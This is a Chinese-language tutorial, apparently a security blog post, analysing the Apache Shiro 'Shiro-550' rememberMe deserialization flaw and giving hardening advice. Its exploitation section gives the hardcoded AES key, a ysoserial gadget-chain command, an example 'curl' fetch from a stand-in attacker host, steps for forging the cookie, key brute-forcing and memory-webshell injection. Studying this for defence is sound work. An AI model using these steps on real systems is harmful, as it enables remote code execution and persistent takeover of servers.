Apache Shiro 反序列化漏洞 (Shiro-550) 深度分析与利用教学<\/strong><\/h2>
一、漏洞概述<\/strong><\/h3>
漏洞编号：<\/strong> CVE-2016-4437，通常被称为 Shiro-550<\/strong>。<\/p>
漏洞影响：<\/strong><\/p>

受影响版本：<\/strong> Apache Shiro <= 1.2.4<\/li>
漏洞本质：<\/strong> 由于加密密钥硬编码在框架源码中，攻击者可以伪造恶意的 rememberMe<\/code> Cookie，触发Java反序列化漏洞，最终实现远程代码执行（RCE）。<\/li> <\/ul> 核心原因：<\/strong><\/p> 硬编码密钥：<\/strong> Shiro 1.2.4及之前版本，用于加密rememberMe<\/code> Cookie的AES密钥是默认的、公开的硬编码值：kPH+bIxk5D2deZiIxcaaaA==<\/code> (Base64编码)。<\/li> 危险的反序列化：<\/strong> Shiro在接收到rememberMe<\/code> Cookie后，会先进行AES解密，然后直接将解密后的数据传递给 ObjectInputStream.readObject()<\/code> 方法进行反序列化，没有任何安全过滤或白名单机制。<\/li> <\/ol> 二、环境搭建<\/strong><\/h3> 所需组件：<\/strong><\/p> JDK:<\/strong> 1.8.0_65 (建议与漏洞环境保持一致)<\/li> Web服务器:<\/strong> Apache Tomcat 8<\/li> 漏洞应用:<\/strong> 使用一个包含Shiro 1.2.4的演示项目（例如P神提供的 shirodemo<\/code>）。<\/li> <\/ol> 搭建步骤：<\/strong><\/p> 获取项目：<\/strong> 克隆演示项目 https:\/\/github.com\/phith0n\/JavaThings\/tree\/master\/shirodemo<\/code> 并用IDEA打开。<\/li> 配置Tomcat：<\/strong> 在IDEA的 Settings<\/code> \/ Build, Execution, Deployment<\/code> \/ Application Servers<\/code> 中添加Tomcat 8的路径。<\/li> 进入 Run\/Debug Configurations<\/code>，添加一个Tomcat Server本地配置。<\/li> 在 Deployment<\/code> 选项卡中，添加项目生成的Artifact（通常是war包）。<\/li> 在 Server<\/code> 选项卡中，将 URL<\/code> 设置为 http:\/\/localhost:8080<\/code>（注意不要加login.jsp<\/code>）。<\/li> <\/ul> <\/li> 运行测试：<\/strong> 启动Tomcat，访问应用。默认登录凭证为 root<\/code> \/ secret<\/code>。<\/li> 抓包技巧：<\/strong> 如果Burp Suite无法抓取 localhost<\/code> 的流量，可以使用本机IPv4地址（如 http:\/\/192.168.x.x:8080<\/code>）进行访问。<\/li> <\/ul> <\/li> <\/ol> 三、漏洞原理深入分析<\/strong><\/h3> 3.1 攻击触发点 - RememberMe Cookie<\/strong><\/h4> 当用户登录时勾选“记住我”，Shiro会在登录成功的HTTP响应头中设置一个 rememberMe<\/code> Cookie。攻击者关注的正是这个Cookie。<\/p> 攻击者可以伪造一个恶意的 rememberMe<\/code> Cookie，发送给服务端。<\/li> 服务端会自动对这个Cookie进行解密和反序列化处理。<\/li> <\/ul> 3.2 服务端处理流程（逆向分析）<\/strong><\/h4> 攻击流程的核心在于理解Shiro服务端如何处理 rememberMe<\/code> Cookie。其调用栈如下：<\/p> CookieRememberMeManager.getRememberedPrincipals(SubjectContext subjectContext)<\/code><\/strong><\/p> 这是入口点，负责从HTTP请求中获取Cookie。<\/li> 关键代码：byte[] bytes = getRememberedSerializedIdentity(subjectContext);<\/code><\/li> <\/ul> <\/li> getRememberedSerializedIdentity(SubjectContext subjectContext)<\/code><\/strong><\/p> 功能：<\/strong> 充当“海关”，提取并预处理Cookie。<\/li> 详细步骤：<\/strong> a. WebUtils.isHttp(...)<\/code>：检查是否为HTTP请求。 b. isIdentityRemoved(...)<\/code>：检查身份是否已被标记为清除（如用户注销），防止无效操作。 c. WebUtils.getHttpRequest(...)<\/code>：获取HttpServletRequest对象。 d. getCookie().readValue(...)<\/code>：从请求头中读取 rememberMe<\/code> Cookie的值。 e. Base64.decode(...)<\/code>：将Cookie值（Base64编码）解码成原始字节数组。解码前会调用 ensurePadding(base64)<\/code> 来补全可能被浏览器截掉的 =<\/code> 号。<\/li> 输出：<\/strong> 返回解码后的字节数组。<\/li> <\/ul> <\/li> AbstractRememberMeManager.convertBytesToPrincipals(byte[] bytes)<\/code><\/strong><\/p> 这是最核心、最危险的方法。<\/strong> 它执行两个致命操作： a. byte[] decrypted = decrypt(bytes);<\/code> \/\/ AES解密<\/strong> b. return deserialize(decrypted);<\/code> \/\/ 反序列化<\/strong><\/li> <\/ul> <\/li> 解密过程 decrypt(byte[] encrypted)<\/code><\/strong><\/p> 算法：<\/strong> AES-128-CBC模式，PKCS5Padding填充。<\/li> 密钥：<\/strong> 通过 getDecryptionCipherKey()<\/code> 获取。逆向追踪发现，该密钥在 AbstractRememberMeManager<\/code> 中是一个硬编码的常量值。<\/strong><\/li> 数据格式：<\/strong> 加密数据由 16字节的随机IV（初始化向量）<\/strong> 和实际的加密序列化数据<\/strong> 拼接而成：[IV][Ciphertext]<\/code>。<\/li> 加密流程伪代码：<\/strong> public<\/span> byte<\/span>[]<\/span> encrypt<\/span>(<\/span>byte<\/span>[]<\/span> plaintext)<\/span> {<\/span> <\/span><\/span> byte<\/span>[]<\/span> iv =<\/span> generateInitializationVector(<\/span>true<\/span>);<\/span> \/\/ 生成16字节IV <\/span><\/span><\/span><\/span> byte<\/span>[]<\/span> ciphertext =<\/span> getCipherService().<\/span>encrypt<\/span>(<\/span>plaintext,<\/span> encryptionCipherKey,<\/span> iv).<\/span>getBytes<\/span>();<\/span> <\/span><\/span> return<\/span> ByteSource.<\/span>Util<\/span>.<\/span>concat<\/span>(<\/span>iv,<\/span> ciphertext).<\/span>getBytes<\/span>();<\/span> \/\/ 拼接IV+密文 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 反序列化过程 deserialize(byte[] serialized)<\/code><\/strong><\/p> 最终调用 DefaultSerializer.deserialize(byte[])<\/code>。<\/li> 致命代码：<\/strong> return new ObjectInputStream(bytes).readObject();<\/code><\/li> 漏洞根源：<\/strong> 这里直接调用了Java原生的 readObject()<\/code> 方法。该方法会递归反序列化数据流中的对象，并自动执行该对象的 readObject()<\/code> 方法。如果序列化数据包含恶意构造的链，就能执行任意代码。<\/li> <\/ul> <\/li> <\/ol> 3.3 加密过程（顺向分析）<\/strong><\/h4> 登录时，Shiro如何生成Cookie？<\/p> 从 CookieRememberMeManager.onSuccessfulLogin()<\/code> 开始。<\/li> 调用 rememberIdentity(subject, token, info)<\/code>。<\/li> 最终进入 AbstractRememberMeManager.convertPrincipalsToBytes(PrincipalCollection principals)<\/code>。<\/li> 其内部流程是：serialize(principals)<\/code> -> encrypt(serializedBytes)<\/code>。<\/li> 加密过程与解密对称，使用相同的硬编码密钥，最后将结果进行Base64编码，设置为Cookie。<\/li> <\/ol> 四、漏洞利用（Shiro-550）<\/strong><\/h3> 4.1 利用前提<\/strong><\/h4> 已知默认密钥 kPH+bIxk5D2deZiIxcaaaA==<\/code>（或目标系统使用了其他弱密钥）。<\/li> 目标环境中存在可利用的第三方反序列化利用链（Gadget Chain）的JAR包，例如： Commons-Collections (CC链，如CC5, CC6, CC7)<\/li> Commons-Beanutils (CB链)<\/li> <\/ul> <\/li> <\/ul> 4.2 利用步骤（以CC5链为例）<\/strong><\/h4> 手工序列化恶意对象：<\/strong><\/p> 使用 ysoserial<\/code> 或类似工具，选择一条可用的链（如 CommonsCollections5<\/code>）和要执行的命令（如 "curl http:\/\/attacker.com\/shell"<\/code> 或计算器 "calc"<\/code>），生成恶意的序列化字节数组。<\/li> java -jar ysoserial.jar CommonsCollections5 "calc" > payload.ser<\/code><\/li> <\/ul> <\/li> 实现AES-CBC加密：<\/strong><\/p> 使用Shiro相同的加密方式处理恶意序列化数据。<\/li> a. 读取 payload.ser<\/code> 得到明文 plaintext<\/code>。<\/li> b. 生成一个16字节的随机IV。<\/li> c. 使用硬编码密钥 kPH+bIxk5D2deZiIxcaaaA==<\/code>（解码后）和生成的IV，以AES-CBC模式加密 plaintext<\/code>。<\/li> d. 将IV和加密后的密文拼接：final_cipher = IV + ciphertext<\/code>。<\/li> <\/ul> <\/li> Base64编码：<\/strong><\/p> 将 final_cipher<\/code> 进行Base64编码。<\/li> <\/ul> <\/li> 发起攻击：<\/strong><\/p> 将编码后的字符串作为 rememberMe<\/code> Cookie的值，在HTTP请求中发送给目标Shiro应用。<\/li> <\/ul> <\/li> <\/ol> 4.3 实战技巧<\/strong><\/h4> 密钥爆破：<\/strong> 如果目标系统修改了默认密钥，可以使用工具（如ShiroAttack2, shiro-exploit）进行常见密钥的爆破。<\/li> 无回显利用：<\/strong> 如果命令执行没有回显，可以使用DNSLog、HTTP请求外带等方式验证漏洞存在性。<\/li> 内存马注入：<\/strong> 在更高阶的攻击中，可以利用反序列化漏洞向JVM中注入内存Webshell（如Tomcat Filter型内存马），实现持久化控制。<\/li> <\/ol> 五、 Java安全机制与漏洞根源<\/strong><\/h3> Java序列化危险特性：<\/strong> 任意类实例化：<\/strong> readObject()<\/code> 可以实例化任意类路径下的对象。<\/li> 自动递归：<\/strong> 会递归地反序列化一个对象所引用的所有其他对象。<\/li> 魔术方法：<\/strong> 许多类有自己的 readObject()<\/code>、readResolve()<\/code> 等方法，反序列化时会自动调用，为攻击者提供了执行点。<\/li> <\/ul> <\/li> 反射：<\/strong> 利用链大量使用Java反射机制来动态调用危险方法，绕过直接代码调用限制。<\/li> <\/ul> 六、加固方案<\/strong><\/h3> 升级Shiro：<\/strong> 立即升级到Shiro 1.2.5及以上版本。新版本要求开发者必须自行配置密钥，不再使用硬编码默认值。<\/li> 自定义强密钥：<\/strong> 如果必须使用旧版，务必在配置中指定一个高强度的、保密的AES密钥。 # shiro.ini<\/span> <\/span><\/span>securityManager.rememberMeManager.cipherKey<\/span> =<\/span> base64编码的强随机密钥<\/span> <\/span><\/span><\/code><\/pre><\/li> 使用RememberMe白名单：<\/strong> 通过重写 AbstractRememberMeManager<\/code> 的 deserialize<\/code> 方法，实现反序列化类的白名单过滤。这是最根本的解决方案。<\/li> JVM层防护：<\/strong> 使用Java安全管理器（Security Manager）或第三方RASP（运行时应用自我保护）产品来限制危险操作，如执行命令、反射调用等。<\/li> <\/ol> 七、总结<\/strong><\/h3> Shiro-550漏洞是一个经典的“缺省不安全”案例。其分析过程涵盖了Web安全、密码学、Java虚拟机机制和软件工程等多个层面。真正的安全研究需要深入到字节码和JVM层面，理解每一行代码背后的实际行为。通过手动逆向分析加密解密流程，安全研究人员不仅能复现漏洞，更能举一反三，发现和防御同类问题。<\/p> 参考资料：<\/strong><\/p> Drunkbaby's Blog: "Java反序列化Shiro篇01-Shiro550流程分析"<\/li> Phith0n's shirodemo Project: https:\/\/github.com\/phith0n\/JavaThings\/tree\/master\/shirodemo<\/code><\/li> <\/ul>